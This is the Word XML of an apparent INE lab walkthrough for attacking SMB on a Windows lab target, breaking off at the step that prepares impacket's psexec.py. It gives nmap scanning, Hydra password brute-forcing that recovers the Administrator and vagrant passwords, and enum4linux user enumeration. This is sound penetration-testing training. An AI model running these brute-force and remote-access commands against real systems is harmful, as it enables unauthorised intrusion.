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20298" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030A3719" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F05E33" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> To outline the various techniques that can be used to exploit SMB on a Windows target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C1B404" w14:textId="66E39A64" w:rsidR="00853ABF" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E653F44" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRDefault="00D8427E"/>
    <w:p w14:paraId="516CA78C" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5064804C" w14:textId="60823E7A" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AEA15AB" wp14:editId="7E282E53">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1139225722" name="Picture 20"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ontent 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343910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9AC6AA" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4468A" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD313B8" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7EA84FC8" w14:textId="11766BBF" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07102CC5" wp14:editId="108ABBD5">
            <wp:extent cx="5772447" cy="2463927"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64949445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494453" name="Picture 649494453"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5772447" cy="2463927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A09B8F9" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209F21E" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> Port scanning with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529A0B37" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>In this lab, we will be targeting the SMB port, as a result, we can limit our Nmap scan to port 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAD1E29" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>We can identify vulnerabilities or misconfigurations on the SMB port by performing an Nmap script scan with the default Nmap script option. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B124A" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA9836A" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> -p 445 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E234DE1" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>As shown in the following screenshot, the default Nmap script reveals the specific version of Windows running on the target in addition to the SMB security mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F7872" w14:textId="50FD88C3" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29748E29" wp14:editId="4E30E110">
            <wp:extent cx="5778797" cy="4521432"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="134031792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317928" name="Picture 1340317928"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5778797" cy="4521432"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C80BD" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> SMB brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73938589" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>In the previous labs, we were able to identify various user accounts through SSH &amp; FTP brute-force attacks. We can use these user accounts to perform a brute force attack to identify legitimate SMB credentials that we can use to authenticate with the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D76BF6B" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>So far, we have been able to identify two user accounts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9A6661" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8427E">
        <w:t>Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7156707A" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8427E">
        <w:t>vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C25DEF9" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>We can limit our brute force attack to these usernames to speed up and reduce the time required to perform the brute force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E7CA99" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>We can use the Hydra tool to perform an SMB brute-force attack. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E544F1D" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236BC502" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:lastRenderedPageBreak/>
        <w:t>hydra -l administrator -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">/unix_passwords.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78719D6A" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>As shown in the following screenshot, after a couple of minutes we can identify the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> account password, which in this case is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vagrant</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B0D47C" w14:textId="44A5DB99" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29E6670F" wp14:editId="011FF767">
            <wp:extent cx="5835950" cy="2921150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199062907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629077" name="Picture 1990629077"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5835950" cy="2921150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD45EF4" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>We can also perform the brute force attack with the user vagrant to identify the password for the user account by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214BA28A" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA7512F" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>hydra -l vagrant -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">/unix_passwords.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46E27C19" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>So far, we have been able to identify legitimate passwords for both the Administrator and vagrant user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFA704" w14:textId="1D5BA74C" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="602DD677" wp14:editId="77EA6D2E">
            <wp:extent cx="5804198" cy="2914800"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="81121549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215493" name="Picture 811215493"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5804198" cy="2914800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48773FC9" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> Enumerating user accounts with enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6DB43" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>Now that we have legitimate SMB credentials, we can use them to enumerate other user accounts on the Windows target by leveraging an enumeration utility called enum4linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA659A1" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC9497B" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4714E546" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">enum4linux -u vagrant -p vagrant -U </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07AC965C" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>As shown in the following screenshot, we are successfully able to identify other user accounts on the Windows target. This information is very useful as it can be used to fine-tune our brute force attacks by limiting the brute force to these usernames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310F86E" w14:textId="776B7106" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E"/>
    <w:p w14:paraId="3D173F7F" w14:textId="1C86E822" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E84273B" wp14:editId="1C334321">
            <wp:extent cx="4978656" cy="3518081"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="42171480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714800" name="Picture 421714800"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4978656" cy="3518081"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEBB312" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> SMB authentication with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50419267" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">Given that we have legitimate user credentials on the Windows target, we can remotely authenticate with the target system via SMB to obtain remote access to the target system. This can be done </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>through the use of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> the Python implementation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9A6396" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>To begin with, you will need to copy the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psexec.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> script from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python3-impacket</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> directory to your current working directory. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EB8076" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CABD1DB" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>cp /usr/share/doc/python3-impacket/examples/psexec.py /root/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669EB817" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>You will then need to provide the psexec.py with executable permissions, this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72093C2B" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67563A73" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> +x psexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D3F4A" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
